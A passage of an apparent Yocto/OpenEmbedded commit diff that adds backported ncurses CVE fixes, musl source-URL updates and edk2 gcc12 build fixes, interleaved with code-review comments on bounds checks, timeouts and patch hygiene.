340 cvssv2 = 0.0
341 cvssv3 = None
342 try:
343 accessVector = accessVector or elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['attackVector']
344 cvssv3 = elt['cve']['metrics']['cvssMetricV30'][0]['cvssData']['baseScore']
345 except KeyError:
346 pass
347 try:
348 accessVector = accessVector or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['attackVector']
349 cvssv3 = cvssv3 or elt['cve']['metrics']['cvssMetricV31'][0]['cvssData']['baseScore']
350 except KeyError:
351 pass
352 accessVector = accessVector or "UNKNOWN"
353 cvssv3 = cvssv3 or 0.0
354
355 conn.execute("insert or replace into NVD values (?, ?, ?, ?, ?, ?)",
356 [cveId, cveDesc, cvssv2, cvssv3, date, accessVector]).close()
357
358 try:
359 # Remove any pre-existing CVE configuration. Even for partial database
360 # update, those will be repopulated. This ensures that old
361 # configuration is not kept for an updated CVE.
362 conn.execute("delete from PRODUCTS where ID = ?", [cveId]).close()
363 for config in elt['cve']['configurations']:
364 # This is suboptimal as it doesn't handle AND/OR and negate, but is better than nothing
365 for node in config["nodes"]:
366 parse_node_and_insert(conn, node, cveId)
367 except KeyError:
368 bb.note("CVE %s has no configurations" % cveId)
369
370do_fetch[nostamp] = "1"
371
372EXCLUDE_FROM_WORLD = "1"
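Review bot: In `parse_node_and_insert` the guard `if len(cpe23) < 6: return` does not cover the `cpe23[6]` read a few lines below it, so a `criteria` string with exactly six fields raises IndexError instead of being skipped; the guard should be `if len(cpe23) < 7:`. The same guard and index pair appears in the cve-update-db-native.bb change earlier in this commit. Each `return` inside `cpe_generator()` also ends the generator, so one non-vulnerable or malformed `cpeMatch` entry drops every later entry of that node from PRODUCTS; if that is not intended, `continue` would keep them, and missing rows here would leave the CVE check with nothing to match for those products. `urllib.request.urlopen(request)` in `nvd_request_next` is called without a `timeout`, so unless a global socket timeout is set the retry loop cannot recover from a stalled connection.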
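--- a/meta/recipes-core/musl/libucontext_git.bb
+++ b/meta/recipes-core/musl/libucontext_git.bb
@@ -10,7 +10,7 @@ DEPENDS = ""
 
 PV = "0.10+${SRCPV}"
 SRCREV = "19fa1bbfc26efb92147b5e85cc0ca02a0e837561"
-SRC_URI = "git://github.com/kaniini/libucontext \
+SRC_URI = "git://github.com/kaniini/libucontext;branch=master;protocol=https \
 "
 
 S = "${WORKDIR}/git"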
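--- a/meta/recipes-core/musl/musl-obstack.bb
+++ b/meta/recipes-core/musl/musl-obstack.bb
@@ -10,7 +10,7 @@ SECTION = "libs"
 
 PV = "1.1"
 SRCREV = "d2ad66b0df44a4b784956f7f7f2717131ddc05f4"
-SRC_URI = "git://github.com/pullmoll/musl-obstack"
+SRC_URI = "git://github.com/pullmoll/musl-obstack;branch=master;protocol=https"
 
 UPSTREAM_CHECK_COMMITS = "1"
 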
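--- a/meta/recipes-core/musl/musl-utils.bb
+++ b/meta/recipes-core/musl/musl-utils.bb
@@ -11,7 +11,7 @@ SECTION = "utils"
 PV = "20170421"
 
 SRCREV = "fb5630138ccabbbc14a19d372096a04e42573c7d"
-SRC_URI = "git://github.com/boltlinux/musl-utils"
+SRC_URI = "git://github.com/boltlinux/musl-utils;branch=master;protocol=https"
 
 UPSTREAM_CHECK_COMMITS = "1"
 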
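--- a/meta/recipes-core/musl/musl_git.bb
+++ b/meta/recipes-core/musl/musl_git.bb
@@ -12,7 +12,7 @@ PV = "${BASEVER}+git${SRCPV}"
 
 # mirror is at git://github.com/kraj/musl.git
 
-SRC_URI = "git://git.musl-libc.org/musl \
+SRC_URI = "git://git.musl-libc.org/musl;branch=master \
  file://0001-Make-dynamic-linker-a-relative-symlink-to-libc.patch \
  file://0002-ldso-Use-syslibdir-and-libdir-as-default-pathes-to-l.patch \
  "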
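--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2021-39537.patch
@@ -0,0 +1,30 @@
+$NetBSD: patch-ncurses_tinfo_captoinfo.c,v 1.1 2021/10/09 07:52:36 wiz Exp $
+
+Fix for CVE-2021-39537 from upstream:
+https://github.com/ThomasDickey/ncurses-snapshots/commit/63ca9e061f4644795d6f3f559557f3e1ed8c738b#diff-7e95c7bc5f213e9be438e69a9d5d0f261a14952bcbd692f7b9014217b8047340
+
+CVE: CVE-2021-39537
+Upstream-Status: Backport [http://cvsweb.netbsd.org/bsdweb.cgi/pkgsrc/devel/ncurses/patches/Attic/patch-ncurses_tinfo_captoinfo.c?rev=1.1&content-type=text/x-cvsweb-markup]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/ncurses/tinfo/captoinfo.c 2020-02-02 23:34:34.000000000 +0000
++++ b/ncurses/tinfo/captoinfo.c
+@@ -216,12 +216,15 @@ cvtchar(register const char *sp)
+ }
+ break;
+ case '^':
++ len = 2;
+ c = UChar(*++sp);
+- if (c == '?')
++ if (c == '?') {
+ c = 127;
+- else
++ } else if (c == '\0') {
++ len = 1;
++ } else {
+ c &= 0x1f;
+- len = 2;
++ }
+ break;
+ default:
+ c = UChar(*sp);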
diff --git a/meta/recipes-core/ncurses/files/CVE-2022-29458.patch b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
new file mode 100644
index 0000000000..eb1b7c96f9
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2022-29458.patch
@@ -0,0 +1,135 @@
1From 5f40697e37e195069f55528fc7a1d77e619ad104 Mon Sep 17 00:00:00 2001
2From: Dan Tran <dantran@microsoft.com>
3Date: Fri, 13 May 2022 13:28:41 -0700
4Subject: [PATCH] ncurses 6.3 before patch 20220416 has an out-of-bounds read
5 and segmentation violation in convert_strings in tinfo/read_entry.c in the
6 terminfo library.
7
8CVE: CVE-2022-29458
9Upstream-Status: Backport
10[https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1009870]
11
12Signed-off-by: Gustavo Lima Chaves <gustavo.chaves@microsoft.com>
13Signed-off-by: Dan Tran <dantran@microsoft.com>
14---
15 ncurses/tinfo/alloc_entry.c | 14 ++++++--------
16 ncurses/tinfo/read_entry.c | 25 +++++++++++++++++++------
17 2 files changed, 25 insertions(+), 14 deletions(-)
18
19diff --git a/ncurses/tinfo/alloc_entry.c b/ncurses/tinfo/alloc_entry.c
20index 4bf7d6c8..b49ad6aa 100644
21--- a/ncurses/tinfo/alloc_entry.c
22+++ b/ncurses/tinfo/alloc_entry.c
23@@ -48,13 +48,11 @@
24
25 #include <tic.h>
26
27-MODULE_ID("$Id: alloc_entry.c,v 1.64 2020/02/02 23:34:34 tom Exp $")
28+MODULE_ID("$Id: alloc_entry.c,v 1.69 2022/04/16 22:46:53 tom Exp $")
29
30 #define ABSENT_OFFSET -1
31 #define CANCELLED_OFFSET -2
32
33-#define MAX_STRTAB 4096 /* documented maximum entry size */
34-
35 static char *stringbuf; /* buffer for string capabilities */
36 static size_t next_free; /* next free character in stringbuf */
37
38@@ -71,8 +69,8 @@ _nc_init_entry(ENTRY * const tp)
39 }
40 #endif
41
42- if (stringbuf == 0)
43- TYPE_MALLOC(char, (size_t) MAX_STRTAB, stringbuf);
44+ if (stringbuf == NULL)
45+ TYPE_MALLOC(char, (size_t) MAX_ENTRY_SIZE, stringbuf);
46
47 next_free = 0;
48
49@@ -108,11 +106,11 @@ _nc_save_str(const char *const string)
50 * Cheat a little by making an empty string point to the end of the
51 * previous string.
52 */
53- if (next_free < MAX_STRTAB) {
54+ if (next_free < MAX_ENTRY_SIZE) {
55 result = (stringbuf + next_free - 1);
56 }
57- } else if (next_free + len < MAX_STRTAB) {
58- _nc_STRCPY(&stringbuf[next_free], string, MAX_STRTAB);
59+ } else if (next_free + len < MAX_ENTRY_SIZE) {
60+ _nc_STRCPY(&stringbuf[next_free], string, MAX_ENTRY_SIZE);
61 DEBUG(7, ("Saved string %s", _nc_visbuf(string)));
62 DEBUG(7, ("at location %d", (int) next_free));
63 next_free += len;
64diff --git a/ncurses/tinfo/read_entry.c b/ncurses/tinfo/read_entry.c
65index 5b570b0f..23c2cebc 100644
66--- a/ncurses/tinfo/read_entry.c
67+++ b/ncurses/tinfo/read_entry.c
68@@ -1,5 +1,5 @@
69 /****************************************************************************
70- * Copyright 2018-2019,2020 Thomas E. Dickey *
71+ * Copyright 2018-2021,2022 Thomas E. Dickey *
72 * Copyright 1998-2016,2017 Free Software Foundation, Inc. *
73 * *
74 * Permission is hereby granted, free of charge, to any person obtaining a *
75@@ -42,7 +42,7 @@
76
77 #include <tic.h>
78
79-MODULE_ID("$Id: read_entry.c,v 1.157 2020/02/02 23:34:34 tom Exp $")
80+MODULE_ID("$Id: read_entry.c,v 1.162 2022/04/16 21:00:00 tom Exp $")
81
82 #define TYPE_CALLOC(type,elts) typeCalloc(type, (unsigned)(elts))
83
84@@ -145,6 +145,7 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
85 {
86 int i;
87 char *p;
88+ bool corrupt = FALSE;
89
90 for (i = 0; i < count; i++) {
91 if (IS_NEG1(buf + 2 * i)) {
92@@ -154,8 +155,20 @@ convert_strings(char *buf, char **Strings, int count, int size, char *table)
93 } else if (MyNumber(buf + 2 * i) > size) {
94 Strings[i] = ABSENT_STRING;
95 } else {
96- Strings[i] = (MyNumber(buf + 2 * i) + table);
97- TR(TRACE_DATABASE, ("Strings[%d] = %s", i, _nc_visbuf(Strings[i])));
98+ int nn = MyNumber(buf + 2 * i);
99+ if (nn >= 0 && nn < size) {
100+ Strings[i] = (nn + table);
101+ TR(TRACE_DATABASE, ("Strings[%d] = %s", i,
102+ _nc_visbuf(Strings[i])));
103+ } else {
104+ if (!corrupt) {
105+ corrupt = TRUE;
106+ TR(TRACE_DATABASE,
107+ ("ignore out-of-range index %d to Strings[]", nn));
108+ _nc_warning("corrupt data found in convert_strings");
109+ }
110+ Strings[i] = ABSENT_STRING;
111+ }
112 }
113
114 /* make sure all strings are NUL terminated */
115@@ -776,7 +789,7 @@ _nc_read_tic_entry(char *filename,
116 * looking for compiled (binary) terminfo data.
117 *
118 * cgetent uses a two-level lookup. On the first it uses the given
119- * name to return a record containing only the aliases for an entry.
120+ * name to return a record containing only the aliases for an entry.
121 * On the second (using that list of aliases as a key), it returns the
122 * content of the terminal description. We expect second lookup to
123 * return data beginning with the same set of aliases.
124@@ -833,7 +846,7 @@ _nc_read_tic_entry(char *filename,
125 #endif /* NCURSES_USE_DATABASE */
126
127 /*
128- * Find and read the compiled entry for a given terminal type, if it exists.
129+ * Find and read the compiled entry for a given terminal type, if it exists.
130 * We take pains here to make sure no combination of environment variables and
131 * terminal type name can be used to overrun the file buffer.
132 */
133--
1342.36.1
135
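Review bot: This backport carries changes that are not part of the bounds fix: the two `MODULE_ID("$Id: ...")` bumps, the copyright-year line in read_entry.c, and the two comment hunks in `_nc_read_tic_entry` whose removed and added lines look identical here (presumably whitespace only). The `$Id` strings then claim upstream revisions 1.69 and 1.162 for files that carry only this one change, which misleads anyone later matching the tree against upstream, and the extra hunks add conflict surface for the next backport. I would drop them and keep only the `MAX_STRTAB` to `MAX_ENTRY_SIZE` hunks and the `convert_strings` hunks. `MAX_ENTRY_SIZE` is not defined in the visible hunks, so it is assumed to come from `<tic.h>`.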
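--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-29491.patch
@@ -0,0 +1,45 @@
+Backport of:
+
+Author: Sven Joachim <svenjoac@gmx.de>
+Description: Change the --disable-root-environ configure option behavior
+ By default, the --disable-root-environ option forbids program run by
+ the superuser to load custom terminfo entries. This patch changes
+ that to only restrict programs running with elevated privileges,
+ matching the behavior of the --disable-setuid-environ option
+ introduced in the 20230423 upstream patchlevel.
+Bug-Debian: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034372#29
+Bug: https://lists.gnu.org/archive/html/bug-ncurses/2023-04/msg00018.html
+Forwarded: not-needed
+Last-Update: 2023-05-01
+
+Upstream-Status: Backport [https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/ncurses/6.2-0ubuntu2.1/ncurses_6.2-0ubuntu2.1.debian.tar.xz]
+CVE: CVE-2023-29491
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+
+---
+ ncurses/tinfo/access.c | 2 --
+ 1 file changed, 2 deletions(-)
+
+--- a/ncurses/tinfo/access.c
++++ b/ncurses/tinfo/access.c
+@@ -178,15 +178,16 @@ _nc_is_file_path(const char *path)
+ NCURSES_EXPORT(int)
+ _nc_env_access(void)
+ {
++ int result = TRUE;
++
+ #if HAVE_ISSETUGID
+ if (issetugid())
+- return FALSE;
++ result = FALSE;
+ #elif HAVE_GETEUID && HAVE_GETEGID
+ if (getuid() != geteuid()
+ || getgid() != getegid())
+- return FALSE;
++ result = FALSE;
+ #endif
+- /* ...finally, disallow root */
+- return (getuid() != ROOT_UID) && (geteuid() != ROOT_UID);
++ return result;
+ }
+ #endif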
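Review bot: With the trailing root check removed, `_nc_env_access()` returns `TRUE` unconditionally on any configuration where neither `HAVE_ISSETUGID` nor `HAVE_GETEUID && HAVE_GETEGID` is defined, whereas before the patch root was still refused there. That fall-through should be stated in a comment above `int result = TRUE;`, for example `/* without issetugid() or geteuid()/getegid() no privilege check is made and the environment is always honoured */`. The `#elif` branch compares real and effective ids only, so it presumably does not notice other forms of elevation such as file capabilities; worth confirming that is acceptable for the target images. The patch header's diffstat (`2 --`, "2 deletions(-)") also no longer matches the hunk, which adds and rewrites lines.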
diff --git a/meta/recipes-core/ncurses/files/CVE-2023-50495.patch b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
new file mode 100644
index 0000000000..58c23866d1
--- /dev/null
+++ b/meta/recipes-core/ncurses/files/CVE-2023-50495.patch
@@ -0,0 +1,79 @@
1Fix for CVE-2023-50495 from upstream:
2https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc
3
4Reference:
5https://invisible-island.net/archives/ncurses/6.4/ncurses-6.4-20230424.patch.gz
6
7Upstream-Status: Backport [import from suse ftp.pbone.net/mirror/ftp.opensuse.org/update/leap-micro/5.3/sle/src/ncurses-6.1-150000.5.20.1.src.rpm
8Upstream commit https://github.com/ThomasDickey/ncurses-snapshots/commit/efe9674ee14b14b788f9618941f97d31742f0adc]
9CVE: CVE-2023-50495
10Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
11---
12 ncurses/tinfo/parse_entry.c | 23 ++++++++++++++++-------
13 1 file changed, 16 insertions(+), 7 deletions(-)
14
15diff --git a/ncurses/tinfo/parse_entry.c b/ncurses/tinfo/parse_entry.c
16index 23574b66..56ba9ae6 100644
17--- a/ncurses/tinfo/parse_entry.c
18+++ b/ncurses/tinfo/parse_entry.c
19@@ -110,7 +110,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
20 /* Well, we are given a cancel for a name that we don't recognize */
21 return _nc_extend_names(entryp, name, STRING);
22 default:
23- return 0;
24+ return NULL;
25 }
26
27 /* Adjust the 'offset' (insertion-point) to keep the lists of extended
28@@ -142,6 +142,11 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
29 for (last = (unsigned) (max - 1); last > tindex; last--)
30
31 if (!found) {
32+ char *saved;
33+
34+ if ((saved = _nc_save_str(name)) == NULL)
35+ return NULL;
36+
37 switch (token_type) {
38 case BOOLEAN:
39 tp->ext_Booleans++;
40@@ -169,7 +174,7 @@ _nc_extend_names(ENTRY * entryp, const char *name, int token_type)
41 TYPE_REALLOC(char *, actual, tp->ext_Names);
42 while (--actual > offset)
43 tp->ext_Names[actual] = tp->ext_Names[actual - 1];
44- tp->ext_Names[offset] = _nc_save_str(name);
45+ tp->ext_Names[offset] = saved;
46 }
47
48 temp.nte_name = tp->ext_Names[offset];
49@@ -337,6 +342,8 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
50 bool is_use = (strcmp(_nc_curr_token.tk_name, "use") == 0);
51 bool is_tc = !is_use && (strcmp(_nc_curr_token.tk_name, "tc") == 0);
52 if (is_use || is_tc) {
53+ char *saved;
54+
55 if (!VALID_STRING(_nc_curr_token.tk_valstring)
56 || _nc_curr_token.tk_valstring[0] == '\0') {
57 _nc_warning("missing name for use-clause");
58@@ -350,11 +357,13 @@ _nc_parse_entry(ENTRY * entryp, int literal, bool silent)
59 _nc_curr_token.tk_valstring);
60 continue;
61 }
62- entryp->uses[entryp->nuses].name = _nc_save_str(_nc_curr_token.tk_valstring);
63- entryp->uses[entryp->nuses].line = _nc_curr_line;
64- entryp->nuses++;
65- if (entryp->nuses > 1 && is_tc) {
66- BAD_TC_USAGE
67+ if ((saved = _nc_save_str(_nc_curr_token.tk_valstring)) != NULL) {
68+ entryp->uses[entryp->nuses].name = saved;
69+ entryp->uses[entryp->nuses].line = _nc_curr_line;
70+ entryp->nuses++;
71+ if (entryp->nuses > 1 && is_tc) {
72+ BAD_TC_USAGE
73+ }
74 }
75 } else {
76 /* normal token lookup */
77--
782.25.1
79
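--- a/meta/recipes-core/ncurses/ncurses.inc
+++ b/meta/recipes-core/ncurses/ncurses.inc
@@ -13,7 +13,7 @@ BINCONFIG = "${bindir}/ncurses5-config ${bindir}/ncursesw5-config \
 inherit autotools binconfig-disabled multilib_header pkgconfig
 
 # Upstream has useful patches at times at ftp://invisible-island.net/ncurses/
-SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https"
+SRC_URI = "git://salsa.debian.org/debian/ncurses.git;protocol=https;branch=master"
 
 EXTRA_AUTORECONF = "-I m4"
 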
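--- a/meta/recipes-core/ncurses/ncurses_6.2.bb
+++ b/meta/recipes-core/ncurses/ncurses_6.2.bb
@@ -3,11 +3,15 @@ require ncurses.inc
 SRC_URI += "file://0001-tic-hang.patch \
  file://0002-configure-reproducible.patch \
  file://0003-gen-pkgconfig.in-Do-not-include-LDFLAGS-in-generated.patch \
+ file://CVE-2021-39537.patch \
+ file://CVE-2022-29458.patch \
+ file://CVE-2023-29491.patch \
+ file://CVE-2023-50495.patch \
  "
 # commit id corresponds to the revision in package version
 SRCREV = "a669013cd5e9d6434e5301348ea51baf306c93c4"
 S = "${WORKDIR}/git"
-EXTRA_OECONF += "--with-abi-version=5"
+EXTRA_OECONF += "--with-abi-version=5 --disable-root-environ"
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+(\.\d+)+(\+\d+)*)"
 
 # This is needed when using patchlevel versions like 6.1+20181013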
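Review bot: `--disable-root-environ` is added to `EXTRA_OECONF` without a comment, and its meaning in this recipe differs from the upstream option because CVE-2023-29491.patch, added in the same change, rewrites it to restrict only programs running with elevated privileges. A reader who knows the upstream flag will assume root cannot load custom terminfo entries, which by that patch's own description is no longer the case. I would add a comment above the line, e.g. `# --disable-root-environ: with CVE-2023-29491.patch applied this restricts setuid/setgid programs only, not root`.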
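--- a/meta/recipes-core/os-release/os-release.bb
+++ b/meta/recipes-core/os-release/os-release.bb
@@ -12,7 +12,9 @@ do_configure[noexec] = "1"
 
 # Other valid fields: BUILD_ID ID_LIKE ANSI_COLOR CPE_NAME
 # HOME_URL SUPPORT_URL BUG_REPORT_URL
-OS_RELEASE_FIELDS = "ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME"
+OS_RELEASE_FIELDS = "\
+ ID ID_LIKE NAME VERSION VERSION_ID PRETTY_NAME DISTRO_CODENAME \
+"
 OS_RELEASE_UNQUOTED_FIELDS = "ID VERSION_ID VARIANT_ID"
 
 ID = "${DISTRO}"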
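--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-genffs-fix-gcc12-warning.patch
@@ -0,0 +1,49 @@
+From 7b005f344e533cd913c3ca05b266f9872df886d1 Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:34 +0800
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+GenFfs.c:545:5: error: pointer ?InFileHandle? used after ?fclose? [-Werror=use-after-free]
+ 545 | Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+GenFfs.c:544:5: note: call to ?fclose? here
+ 544 | fclose (InFileHandle);
+ | ^~~~~~~~~~~~~~~~~~~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/7b005f344e533cd913c3ca05b266f9872df886d1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/GenFfs/GenFfs.c | 2 +-
+ BaseTools/Source/C/GenSec/GenSec.c | 2 +-
+ 2 files changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/BaseTools/Source/C/GenFfs/GenFfs.c b/BaseTools/Source/C/GenFfs/GenFfs.c
+index 949025c33325..d78d62ab3689 100644
+--- a/BaseTools/Source/C/GenFfs/GenFfs.c
++++ b/BaseTools/Source/C/GenFfs/GenFfs.c
+@@ -542,7 +542,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);
+diff --git a/BaseTools/Source/C/GenSec/GenSec.c b/BaseTools/Source/C/GenSec/GenSec.c
+index d54a4f9e0a7d..b1d05367ec0b 100644
+--- a/BaseTools/Source/C/GenSec/GenSec.c
++++ b/BaseTools/Source/C/GenSec/GenSec.c
+@@ -1062,7 +1062,7 @@ GetAlignmentFromFile(char *InFile, UINT32 *Alignment)
+ PeFileBuffer = (UINT8 *) malloc (PeFileSize);
+ if (PeFileBuffer == NULL) {
+ fclose (InFileHandle);
+- Error(NULL, 0, 4001, "Resource", "memory cannot be allocated of %s", InFileHandle);
++ Error(NULL, 0, 4001, "Resource", "memory cannot be allocated for %s", InFile);
+ return EFI_OUT_OF_RESOURCES;
+ }
+ fread (PeFileBuffer, sizeof (UINT8), PeFileSize, InFileHandle);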
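--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-lzmaenc-fix-gcc12-warning.patch
@@ -0,0 +1,53 @@
+From 24551a99d1f765c891a4dc21a36f18ccbf56e612 Mon Sep 17 00:00:00 2001
+From: Steve Sakoman <steve@sakoman.com>
+Date: Tue, 10 Jan 2023 06:15:00 -1000
+Subject: [PATCH] BaseTools: fix gcc12 warning
+
+Sdk/C/LzmaEnc.c: In function ?LzmaEnc_CodeOneMemBlock?:
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*p.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+Sdk/C/LzmaEnc.c:2828:19: error: storing the address of local variable ?outStream? in ?*(CLzmaEnc *)pp.rc.outStream? [-Werror=dangling-pointer=]
+ 2828 | p->rc.outStream = &outStream.vt;
+ | ~~~~~~~~~~~~~~~~^~~~~~~~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?outStream? declared here
+ 2811 | CLzmaEnc_SeqOutStreamBuf outStream;
+ | ^~~~~~~~~
+Sdk/C/LzmaEnc.c:2811:28: note: ?pp? declared here
+cc1: all warnings being treated as errors
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/85021f8cf22d1bd4114803c6c610dea5ef0059f1]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+---
+ BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+index e281716fee..b575c4f888 100644
+--- a/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
++++ b/BaseTools/Source/C/LzmaCompress/Sdk/C/LzmaEnc.c
+@@ -2638,12 +2638,13 @@ SRes LzmaEnc_CodeOneMemBlock(CLzmaEncHandle pp, Bool reInit,
+
+ nowPos64 = p->nowPos64;
+ RangeEnc_Init(&p->rc);
+- p->rc.outStream = &outStream.vt;
+
+ if (desiredPackSize == 0)
+ return SZ_ERROR_OUTPUT_EOF;
+
++ p->rc.outStream = &outStream.vt;
+ res = LzmaEnc_CodeOneBlock(p, desiredPackSize, *unpackSize);
++ p->rc.outStream = NULL;
+
+ *unpackSize = (UInt32)(p->nowPos64 - nowPos64);
+ *destLen -= outStream.rem;
+--
+2.25.1
+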
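--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Basetools-turn-off-gcc12-warning.patch
@@ -0,0 +1,41 @@
+From 22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c Mon Sep 17 00:00:00 2001
+From: Gerd Hoffmann <kraxel@redhat.com>
+Date: Thu, 24 Mar 2022 20:04:36 +0800
+Subject: [PATCH] Basetools: turn off gcc12 warning
+
+In function ?SetDevicePathEndNode?,
+ inlined from ?FileDevicePath? at DevicePathUtilities.c:857:5:
+DevicePathUtilities.c:321:3: error: writing 4 bytes into a region of size 1 [-Werror=stringop-overflow=]
+ 321 | memcpy (Node, &mUefiDevicePathLibEndDevicePath, sizeof (mUefiDevicePathLibEndDevicePath));
+ | ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+In file included from UefiDevicePathLib.h:22,
+ from DevicePathUtilities.c:16:
+../Include/Protocol/DevicePath.h: In function ?FileDevicePath?:
+../Include/Protocol/DevicePath.h:51:9: note: destination object ?Type? of size 1
+ 51 | UINT8 Type; ///< 0x01 Hardware Device Path.
+ | ^~~~
+
+Signed-off-by: Gerd Hoffmann <kraxel@redhat.com>
+Reviewed-by: Bob Feng <bob.c.feng@intel.com>
+
+Upstream-Status: Backport [https://github.com/tianocore/edk2/commit/22130dcd98b4d4b76ac8d922adb4a2dbc86fa52c]
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ BaseTools/Source/C/DevicePath/GNUmakefile | 3 +++
+ 1 file changed, 3 insertions(+)
+
+diff --git a/BaseTools/Source/C/DevicePath/GNUmakefile b/BaseTools/Source/C/DevicePath/GNUmakefile
+index 7ca08af9662d..b05d2bddfa68 100644
+--- a/BaseTools/Source/C/DevicePath/GNUmakefile
++++ b/BaseTools/Source/C/DevicePath/GNUmakefile
+@@ -13,6 +13,9 @@ OBJECTS = DevicePath.o UefiDevicePathLib.o DevicePathFromText.o DevicePathUtili
+
+ include $(MAKEROOT)/Makefiles/app.makefile
+
++# gcc 12 trips over device path handling
++BUILD_CFLAGS += -Wno-error=stringop-overflow
++
+ LIBS = -lCommon
+ ifeq ($(CYGWIN), CYGWIN)
+ LIBS += -L/lib/e2fsprogs -luuid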
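Review bot: The added `BUILD_CFLAGS += -Wno-error=stringop-overflow` in DevicePath/GNUmakefile relaxes the check for every source file of the DevicePath tool, not only for the `memcpy` in `SetDevicePathEndNode` that the commit message quotes. Any later overflow gcc reports in this directory will then appear as a warning instead of stopping the build. The comment above the flag should name the site and state that the warning is kept on purpose, e.g. `# gcc 12 reports stringop-overflow for the memcpy in SetDevicePathEndNode (DevicePathUtilities.c); only -Werror is relaxed, the warning stays visible`. Whether the diagnostic is a false positive cannot be judged from this hunk.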
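--- /dev/null
+++ b/meta/recipes-core/ovmf/ovmf/0001-Fix-VLA-parameter-warning.patch
@@ -0,0 +1,51 @@
+From 498627ebda6271b59920f43a0b9b6187edeb7b09 Mon Sep 17 00:00:00 2001
+From: Adrian Herrera <adr.her.arc.95@gmail.com>
+Date: Mon, 22 Mar 2021 21:06:47 +0000
+Subject: [PATCH] Fix VLA parameter warning
+
+Make VLA buffer types consistent in declarations and definitions.
+Resolves build crash when using -Werror due to "vla-parameter" warning.
+
+Upstream-Status: Submitted [https://github.com/google/brotli/pull/893]
+Signed-off-by: Adrian Herrera <adr.her.arc.95@gmail.com>
+---
+ c/dec/decode.c | 6 ++++--
+ c/enc/encode.c | 5 +++--
+ 2 files changed, 7 insertions(+), 4 deletions(-)
+
+diff --git a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+index 114c505..bb6f1ab 100644
+--- a/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
++++ b/BaseTools/Source/C/BrotliCompress/brotli/c/dec/decode.c
+@@ -2030,8 +2030,10 @@ static BROTLI_NOINLINE BrotliDecoderErrorCode SafeProcessCommands(
+ }
+
+ BrotliDecoderResult BrotliDecoderDecompress(
+- size_t encoded_size, const uint8_t* encoded_buffer, size_t* decoded_size,
+- uint8_t* decoded_buffer) {
++ size_t encoded_size,
++ const uint8_t encoded_buffer[BROTLI_ARRAY_PARAM(encoded_size)],
++ size_t* decoded_size,
++ uint8_t decoded_buffer[BROTLI_ARRAY_PARAM(*decoded_size)]) {
+ BrotliDecoderState s;
+ BrotliDecoderResult result;
+ size_t total_out = 0;
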